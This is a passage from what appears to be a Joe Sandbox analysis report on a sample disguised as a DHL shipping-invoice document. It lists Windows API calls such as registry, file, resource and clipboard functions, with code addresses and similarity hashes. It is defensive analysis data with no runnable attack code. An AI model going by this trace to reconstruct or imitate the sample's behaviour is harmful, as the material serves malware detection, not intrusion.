                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                                                                                                      • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                                      • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
